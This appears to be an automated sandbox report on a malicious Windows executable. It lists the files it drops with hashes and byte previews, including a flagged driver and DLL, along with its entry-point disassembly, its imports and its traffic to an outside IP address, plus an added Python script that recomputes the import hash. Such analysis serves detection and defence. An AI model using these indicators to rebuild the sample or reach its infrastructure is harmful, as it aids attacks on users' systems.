                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):879
                                                    Entropy (8bit):4.5851931774575325
                                                    Encrypted:false
                                                    SSDEEP:6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
                                                    MD5:E54C4296F011EC91D935AA353C936E34
                                                    SHA1:53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
                                                    SHA-256:81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
                                                    SHA-512:5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
                                                    Malicious:false
                                                    Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#*%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):512
                                                    Entropy (8bit):5.26296536154187
                                                    Encrypted:false
                                                    SSDEEP:6:WwgONBui9QCrR0CrCa2BIDR/pYeL1g87OdUzW9E40/qcX:PgONBuUQCrZMBIDRb1gmgUzWg3
                                                    MD5:3F830864D62708390D84A4629D88083D
                                                    SHA1:79A9BB07FED0DB63C4B671000DD4069AB02ED5C3
                                                    SHA-256:9303E0E29A2AC53C31D43FC98C828A1FEB5814D2078EB868FE19CCB324D2C263
                                                    SHA-512:5DF33762B5D709E05272CD01C3B43A01671938A3F9D4DE9911EE8EF12FE89F8958493CCDFB23F940FE493B95F01A677D58F73FAACF0FC7D8C2FD5C9EA9DDD8A1
                                                    Malicious:false
                                                    Preview:....l%00XE.G#vi([[.K%f).GDG@'n!,EUYB!1l!NL.@n')&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyy..L.j? a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33[F.D uj+XX.H&e*-DGDC$m"/FVZA"2o"MO.Ao&('''''''''''''''''''''''''''''''''OSSW$mxx..M.k>!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):133136
                                                    Entropy (8bit):6.350273548571922
                                                    Encrypted:false
                                                    SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                                    MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                    SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                                    SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                                    SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: 2b687482300.6345827638.08.exe, Detection: malicious
                                                    • Filename: 45631.exe, Detection: malicious
                                                    • Filename: 0000000000000000.exe, Detection: malicious
                                                    • Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):3889557
                                                    Entropy (8bit):7.999938761656195
                                                    Encrypted:true
                                                    SSDEEP:98304:sAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:nndLOZS/DtpPJRO8OHBL4f2UQI+A
                                                    MD5:91DB3C45CE40B5DB8A87F6D92474A4FC
                                                    SHA1:AE8EC9BE8B60C7C4BAE49655470E8F10F9100519
                                                    SHA-256:3B009291155998CA06DFBEB6E3BCEDF20ED76E3A269DA2CAC81B132D88662AC2
                                                    SHA-512:764D1431C6040D07A5F49F5BD6DB04562D4746A87DA33C83F91BA58CE6FD1266A79FF34712A0D37E94FD866370ED35F08267B07152C139156EA7715C89796E85
                                                    Malicious:false
                                                    Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:GIF image data, version 89a, 10 x 10
                                                    Category:dropped
                                                    Size (bytes):8228
                                                    Entropy (8bit):7.978923000469196
                                                    Encrypted:false
                                                    SSDEEP:192:hBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:hBuNhyTlBU2dp+1XrBuCgp9vU0l
                                                    MD5:4ACFB0FC0A376754784BB427C95ECCA7
                                                    SHA1:63A2FB89DAB3482A1A74C9DCEA2E27B72FF626E4
                                                    SHA-256:983CA2EC77C3F0121DE7A57730F270FA5F91AEA40EBC46400F497DA7E59480C1
                                                    SHA-512:6A3CFB935D051392A73D978A7B6654A03F2A834771C93D157E506F7EF8B2A906BDF1B6383BCB3BD44197C750ED031A3FA8F99F6BEE961146BF37B719D1BDE340
                                                    Malicious:false
                                                    Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):122880
                                                    Entropy (8bit):6.002051339486298
                                                    Encrypted:false
                                                    SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FY:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gY
                                                    MD5:F6FA830A46CCFEE64B35E86AC7C4DEB8
                                                    SHA1:22B29F9749126142F7B3266E13FE83F05C1D09E6
                                                    SHA-256:E8F824DA259F7B4A76259DF16587985CAA5067B7BC8E811A63C05152A1A9F69F
                                                    SHA-512:8166B8CCFBC1C6AFC2E8B8BC09BA9E9FBAA72195985DBE6FFE4DD337C14FD62F5661103168237800242D5B759A5113AFF128CC9E6B61E30B30AE83DE4800A05A
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):28272
                                                    Entropy (8bit):6.229054372792222
                                                    Encrypted:false
                                                    SSDEEP:384:83YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/t:8OUkgfdZ9pRyv+uPzCMHo3q4tDghr
                                                    MD5:8EF89CB07F0E0F58C571E82CDFA6C4FE
                                                    SHA1:156DB3F0ACCE57E295FE1E25B96D8A7E0D84D444
                                                    SHA-256:50C1A741E10BD824785A2B48E52425B4B6C20C614B19C5AC278CECAB31A9E51B
                                                    SHA-512:DDA533712B36D6B192BD6A2978E727BE8C06DB58BA387D607C41FFFEB9BFF228106EA36D99BC55EE2E957D40E449D329D8DBBC9CD6CE9CC2646B5459CC74E742
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l................................................|..........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Entropy (8bit):0.08192237708325625
                                                    TrID:
                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                    • DOS Executable Generic (2002/1) 0.92%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:2749837485743-7684385786.05.exe
                                                    File size:30'885'376 bytes
                                                    MD5:5b695fabfcd1da54f7c193ef5f11ef6a
                                                    SHA1:8097a65d6e89522851b53b831aaf45afb9f0267b
                                                    SHA256:697d0f16d16ac7df2254469ab782d57a121c487ddaacca4a71f82bd976490ff2
                                                    SHA512:1f917fbed3c8a8b0d4896ed2dddd4040fb91565ee40c7513ebccd0ebd0371a860fcb5b1cb63fbfdbfa6ed2869cbaa400a27afbdeb47c78d4539579dc738ef37a
                                                    SSDEEP:3072:yBz0z6OFlTEzEQUZFtabsn8cZ1YQpjZoSc2faC1r/wDJPjYR+rH/:yd0GulTEo3tao8k1xv3aC1r+jYR+T
                                                    TLSH:77679F5A326410F9D5BFD178C9A20A46D772B866437293CF063446AADF337D0AD3B362
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C+...J...J...J....O..J...2B..J...J..zJ....z."J....{.jJ....K..J....L..J..Rich.J..........................PE..d...i..N..........#
                                                    Icon Hash:00928e8e8686b000
                                                    Entrypoint:0x140008c38
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x140000000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x4EF3A569 [Thu Dec 22 21:47:21 2011 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:2
                                                    File Version Major:5
                                                    File Version Minor:2
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:2
                                                    Import Hash:e055d655d830344970c4208138facfc1
                                                    Instruction
                                                    dec eax
                                                    sub esp, 28h
                                                    call 00007FEDCCC1DB34h
                                                    dec eax
                                                    add esp, 28h
                                                    jmp 00007FEDCCC1161Eh
                                                    int3
                                                    int3
                                                    dec eax
                                                    mov dword ptr [000146F5h], ecx
                                                    ret
                                                    dec eax
                                                    mov dword ptr [esp+10h], ebx
                                                    dec eax
                                                    mov dword ptr [esp+18h], esi
                                                    push ebp
                                                    push edi
                                                    inc ecx
                                                    push esp
                                                    dec eax
                                                    lea ebp, dword ptr [esp-000004F0h]
                                                    dec eax
                                                    sub esp, 000005F0h
                                                    dec eax
                                                    mov eax, dword ptr [00012AF8h]
                                                    dec eax
                                                    xor eax, esp
                                                    dec eax
                                                    mov dword ptr [ebp+000004E0h], eax
                                                    inc ecx
                                                    mov edi, eax
                                                    mov esi, edx
                                                    mov ebx, ecx
                                                    cmp ecx, FFFFFFFFh
                                                    je 00007FEDCCC191E7h
                                                    call 00007FEDCCC1DB96h
                                                    and dword ptr [esp+70h], 00000000h
                                                    dec eax
                                                    lea ecx, dword ptr [esp+74h]
                                                    xor edx, edx
                                                    inc ecx
                                                    mov eax, 00000094h
                                                    call 00007FEDCCC1895Bh
                                                    dec esp
                                                    lea ebx, dword ptr [esp+70h]
                                                    dec eax
                                                    lea eax, dword ptr [ebp+10h]
                                                    dec eax
                                                    lea ecx, dword ptr [ebp+10h]
                                                    dec esp
                                                    mov dword ptr [esp+48h], ebx
                                                    dec eax
                                                    mov dword ptr [esp+50h], eax
                                                    call dword ptr [0000D581h]
                                                    dec esp
                                                    mov esp, dword ptr [ebp+00000108h]
                                                    dec eax
                                                    lea edx, dword ptr [esp+40h]
                                                    dec ecx
                                                    mov ecx, esp
                                                    inc ebp
                                                    xor eax, eax
                                                    call 00007FEDCCC2546Dh
                                                    dec eax
                                                    test eax, eax
                                                    je 00007FEDCCC19219h
                                                    dec eax
                                                    and dword ptr [esp+38h], 00000000h
                                                    dec eax
                                                    mov edx, dword ptr [esp+40h]
                                                    dec eax
                                                    lea ecx, dword ptr [esp+60h]
                                                    dec eax
                                                    mov dword ptr [esp+30h], ecx
                                                    dec eax
                                                    lea ecx, dword ptr [esp+58h]
                                                    dec esp
                                                    mov ecx, eax
                                                    Programming Language:
                                                    • [ASM] VS2010 SP1 build 40219
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [C++] VS2010 SP1 build 40219
                                                    • [ C ] VS2010 SP1 build 40219
                                                    • [RES] VS2010 SP1 build 40219
                                                    • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1a314 | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1d7a000 | 0x5c8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1d79000 | 0xfb4 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x16440 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x16000 | 0x3d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1424e | 0x14400 | 2818c01f5b3619f5d08841e50f9f34ae | False | 0.5304542824074074 | data | 6.38689177603382 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x16000 | 0x4fb2 | 0x5000 | b5004cfda8e71f2299dfabff87abc568 | False | 0.343359375 | data | 4.861556529219821 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1b000 | 0x1d5d600 | 0x1d59800 | c3446221fb4627522fbc3e5c902154fd | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x1d79000 | 0xfb4 | 0x1000 | a1ff09aebd65854c71ab76238d270b83 | False | 0.485595703125 | data | 4.980072699437705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x1d7a000 | 0x5c8 | 0x600 | 56a4da9c71a7d95e35ee0ccb4e062a95 | False | 0.419921875 | data | 4.212061586306468 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x1d7a0a0 | 0x3cc | data | English | United States | 0.411522633744856
RT_MANIFEST | 0x1d7a46c | 0x15a | ASCII text, with CRLF line terminators | English | United States | 0.5491329479768786
DLL | Import
KERNEL32.dll | DisconnectNamedPipe, ConnectNamedPipe, ReadFile, GetExitCodeProcess, WaitForSingleObject, CreateProcessW, IsBadStringPtrW, WideCharToMultiByte, SetThreadPriority, GetCurrentThread, CreateNamedPipeW, Sleep, InitializeCriticalSection, DeleteCriticalSection, SetPriorityClass, GetCurrentProcess, FreeLibrary, CreateFileW, LoadLibraryA, EnterCriticalSection, GetProcessHeap, SetEndOfFile, GetStringTypeW, LCMapStringW, SetFilePointer, MultiByteToWideChar, WriteConsoleW, HeapReAlloc, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, GetLastError, WaitNamedPipeW, CloseHandle, GetSystemTime, GetTempPathW, GetProcAddress, GetModuleFileNameW, GetConsoleMode, GetConsoleCP, SetStdHandle, HeapSize, GetSystemTimeAsFileTime, GetCurrentProcessId, GetTickCount, LeaveCriticalSection, WriteFile, FlushFileBuffers, ExitThread, ResumeThread, CreateThread, GetModuleHandleW, ExitProcess, DecodePointer, GetCommandLineA, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, TerminateProcess, HeapFree, HeapAlloc, RaiseException, RtlPcToFileHeader, RtlUnwindEx, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, LoadLibraryW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapSetInformation, GetVersion, HeapCreate, VirtualAlloc
USER32.dll | wsprintfW, PostMessageW, MessageBoxW, PostQuitMessage, DefWindowProcW, EndPaint, GetMessageW, TranslateMessage, DispatchMessageW, CreateWindowExW, ShowWindow, UpdateWindow, RegisterClassExW, BeginPaint
GDI32.dll | StartDocW, StartPage, EndPage, EndDoc, DeleteDC, CreateDCW
WINSPOOL.DRV | ClosePrinter, DocumentPropertiesW, GetPrinterDriverW, OpenPrinterW
ADVAPI32.dll | SetSecurityDescriptorDacl, GetUserNameW, InitializeSecurityDescriptor
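The "Import Hash" in the header is an imphash over exactly this import table, so it can be recomputed from the listing and compared against the reported value. The block below is an added example written for this page, not Joe Sandbox's or pefile's own code; it reimplements the pefile algorithm (lowercase "library.function" pairs, in import order, joined with commas, MD5) over the table as printed above. It assumes the listing preserves the file's import directory order and that every import is by name (pefile substitutes ordinal names for ordinal-only imports, which this table does not contain); whether the result equals the reported e055d655d830344970c4208138facfc1 is left to the reader to run, not asserted here. One caveat worth seeing in code: pefile strips only the .dll, .sys and .ocx extensions, so WINSPOOL.DRV contributes "winspool.drv.closeprinter" and so on.

```python
import hashlib

# Import table as printed in the report, in table order: (DLL, comma-separated function names).
IMPORTS = [
    ("KERNEL32.dll", "DisconnectNamedPipe, ConnectNamedPipe, ReadFile, GetExitCodeProcess, WaitForSingleObject, CreateProcessW, IsBadStringPtrW, WideCharToMultiByte, SetThreadPriority, GetCurrentThread, CreateNamedPipeW, Sleep, InitializeCriticalSection, DeleteCriticalSection, SetPriorityClass, GetCurrentProcess, FreeLibrary, CreateFileW, LoadLibraryA, EnterCriticalSection, GetProcessHeap, SetEndOfFile, GetStringTypeW, LCMapStringW, SetFilePointer, MultiByteToWideChar, WriteConsoleW, HeapReAlloc, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, GetLastError, WaitNamedPipeW, CloseHandle, GetSystemTime, GetTempPathW, GetProcAddress, GetModuleFileNameW, GetConsoleMode, GetConsoleCP, SetStdHandle, HeapSize, GetSystemTimeAsFileTime, GetCurrentProcessId, GetTickCount, LeaveCriticalSection, WriteFile, FlushFileBuffers, ExitThread, ResumeThread, CreateThread, GetModuleHandleW, ExitProcess, DecodePointer, GetCommandLineA, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, TerminateProcess, HeapFree, HeapAlloc, RaiseException, RtlPcToFileHeader, RtlUnwindEx, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, LoadLibraryW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapSetInformation, GetVersion, HeapCreate, VirtualAlloc"),
    ("USER32.dll", "wsprintfW, PostMessageW, MessageBoxW, PostQuitMessage, DefWindowProcW, EndPaint, GetMessageW, TranslateMessage, DispatchMessageW, CreateWindowExW, ShowWindow, UpdateWindow, RegisterClassExW, BeginPaint"),
    ("GDI32.dll", "StartDocW, StartPage, EndPage, EndDoc, DeleteDC, CreateDCW"),
    ("WINSPOOL.DRV", "ClosePrinter, DocumentPropertiesW, GetPrinterDriverW, OpenPrinterW"),
    ("ADVAPI32.dll", "SetSecurityDescriptorDacl, GetUserNameW, InitializeSecurityDescriptor"),
]

REPORTED_IMPHASH = "e055d655d830344970c4208138facfc1"  # value printed in the report header

# pefile drops only these extensions from the library name; anything else (e.g. ".drv") is kept.
STRIPPED_EXTS = ("ocx", "sys", "dll")


def normalize_lib(dll_name):
    """Lowercase the library name and strip the extension only if pefile would."""
    lib = dll_name.lower()
    base, dot, ext = lib.rpartition(".")
    return base if dot and ext in STRIPPED_EXTS else lib


def imphash_input(imports):
    """The exact string pefile hashes: 'lib.func' pairs, lowercase, comma-joined, in import order.
    Assumes every import is by name; ordinal-only imports would need pefile's ordinal lookup."""
    parts = []
    for dll, funcs in imports:
        lib = normalize_lib(dll)
        for func in funcs.split(","):
            func = func.strip()
            if func:
                parts.append(f"{lib}.{func.lower()}")
    return ",".join(parts)


def imphash(imports):
    """MD5 of the imphash input string, as pefile's get_imphash() returns it."""
    return hashlib.md5(imphash_input(imports).encode()).hexdigest()


if __name__ == "__main__":
    computed = imphash(IMPORTS)
    print("computed :", computed)
    print("reported :", REPORTED_IMPHASH)
    print("match    :", computed == REPORTED_IMPHASH)
```

Because the hash covers the order of entries as well as their names, the same import set in a different order yields a different imphash; that is why imphash pivots across samples built from the same source with the same toolchain, but breaks as soon as a packer rebuilds the import table.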
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 6, 2025 04:43:26.704183102 CET | 49974 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:26.704253912 CET | 443 | 49974 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:26.704319000 CET | 49974 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:26.715024948 CET | 49974 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:26.715042114 CET | 443 | 49974 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:27.897541046 CET | 443 | 49974 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:27.897644997 CET | 49974 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:27.898205042 CET | 443 | 49974 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:27.898269892 CET | 49974 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:27.956360102 CET | 49974 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:27.956389904 CET | 443 | 49974 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:27.956743956 CET | 443 | 49974 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:27.958825111 CET | 49974 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:27.960669041 CET | 49974 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:28.007343054 CET | 443 | 49974 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:28.270066977 CET | 443 | 49974 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:28.270133018 CET | 49974 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:28.270164967 CET | 443 | 49974 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:28.270279884 CET | 49974 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:28.270323992 CET | 443 | 49974 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:28.270395041 CET | 443 | 49974 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:28.270437002 CET | 49974 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:28.289302111 CET | 49974 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:28.289331913 CET | 443 | 49974 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:28.394443989 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:28.394504070 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:28.394593000 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:28.394848108 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
Jan 6, 2025 04:43:28.394860029 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:29.586813927 CET | 443 | 49975 | 39.103.20.26 | 192.168.2.9
Jan 6, 2025 04:43:29.587013006 CET | 49975 | 443 | 192.168.2.9 | 39.103.20.26
